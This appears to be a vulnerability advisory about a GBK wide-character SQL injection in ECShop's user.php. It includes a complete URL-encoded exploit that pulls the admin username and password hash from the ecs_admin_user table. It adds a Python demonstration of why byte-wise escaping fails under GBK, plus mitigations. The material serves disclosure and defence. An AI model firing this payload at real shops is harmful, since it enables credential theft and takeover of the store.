ECShop GBK wide-character injection vulnerability - Vulnerability warning - the black bar safety net

2012-11-08T00:00:00
ID MYHACK58:62201235451
Type myhack58
Reporter Anonymous
Modified 2012-11-08T00:00:00

Description

ECShop's filtering of wide characters is still incomplete.

The premise is the following parameters:

http://www.xxx.com/user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%292%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23
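
Why a byte-wise quote filter is incomplete for the `%ce%27` prefix of the `username` value above, as an added example (not ECShop code and not part of the original report). It assumes the filter behaves like PHP `addslashes()` and that the database connection interprets bytes as GBK; all helper names are hypothetical. It also shows a strict well-formedness check as one mitigation.

```python
from urllib.parse import unquote_to_bytes

# Constructed sample: only the leading bytes of the username value in the report.
SAMPLE = "%ce%27%20and%201=1"


def addslashes(raw: bytes) -> bytes:
    """Charset-unaware escaping modelled on PHP addslashes() (assumed filter)."""
    out = bytearray()
    for b in raw:
        if b == 0x00:
            out += b"\\0"
        else:
            if b in (0x27, 0x22, 0x5C):  # ' " \
                out.append(0x5C)         # the backslash is inserted per byte
            out.append(b)
    return bytes(out)


def unescaped_quotes(escaped: bytes, charset: str) -> int:
    """Count single quotes with no backslash in front of them once the
    server interprets the escaped bytes in `charset`."""
    text = escaped.decode(charset, errors="replace")
    count = i = 0
    while i < len(text):
        if text[i] == "\\":
            i += 2                       # skip the escaped character
            continue
        count += text[i] == "'"
        i += 1
    return count


def is_wellformed_gbk(raw: bytes) -> bool:
    """Mitigation check: refuse input that is not valid GBK before escaping.
    0xCE followed by 0x27 is not a legal GBK sequence (trail bytes start at 0x40)."""
    try:
        raw.decode("gbk")
        return True
    except UnicodeDecodeError:
        return False


if __name__ == "__main__":
    raw = unquote_to_bytes(SAMPLE)       # b"\xce' and 1=1"
    escaped = addslashes(raw)            # b"\xce\\' and 1=1"
    print("single-byte view:", unescaped_quotes(escaped, "latin-1"))
    print("GBK view:        ", unescaped_quotes(escaped, "gbk"))
    print("well-formed GBK: ", is_wellformed_gbk(raw))
```

Under GBK the inserted 0x5C becomes the trail byte of 0xCE, so the quote that follows is no longer escaped. Parameterized queries, or escaping done by the database driver with the connection charset set through the driver, remove the dependency on this filter.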

Test report
